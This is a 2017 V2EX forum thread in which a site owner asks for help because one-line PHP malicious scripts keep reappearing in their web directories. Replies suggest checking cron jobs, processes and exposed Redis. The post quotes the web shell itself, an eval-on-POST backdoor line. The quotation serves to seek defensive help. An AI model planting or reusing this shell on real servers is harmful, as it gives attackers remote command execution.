V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
ningcool
V2EX  ›  Linux

服务器大神来支招,网站被挂马!

  •  
  •   ningcool · 2017-06-29 18:11:50 +08:00 · 12067 次点击
    这是一个创建于 2722 天前的主题,其中的信息可能已经有所发展或是发生改变。

    网站隔几天就会在 web 的一些目录下生成垃圾.php 的脚本文件。比如最近的一个 php 文件:

    < php ? php @ eval ( $_POST [ 'cmd ']) ; ? >

    只有这么一句话的恶意脚本。

    我的服务器在阿里云,也买了安骑士杀毒,但是只能检测到恶意脚本,并隔离,但具体这些脚本怎么生成的无法得知,因为隔离了,几天后又有新的垃圾脚本生成。也就是我的 linux 系统里是不是有后门,怎么揪出来? 还请各位服务器大神给点建议,指点迷津。

    104 条回复    2017-07-11 17:48:15 +08:00
    1  2  
    ningcool
        101
    ningcool  
    OP
       2017-07-03 10:43:59 +08:00
    @Admstor 感谢这么多的中肯建议!
    ningcool
        102
    ningcool  
    OP
       2017-07-03 10:44:50 +08:00
    谢谢你的建议,wp 我也在用,感觉确实慢了一些。用到了缓存插件好了一点。
    MARCH0
        103
    MARCH0  
       2017-07-03 11:52:52 +08:00
    @ningcool 不给访问权限好像会把脚本下载回来
    hugedata
        104
    hugedata  
       2017-07-11 17:48:15 +08:00
    哥们,看看服务器有没有定时任务或者进程里有不正常的,另外,你没有装 Redis 吧?现在阿里云上装 redis 的中招的不少,被控挖矿的比较多。
    1  2  
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5279 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 03:14 · PVG 11:14 · LAX 19:14 · JFK 22:14
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.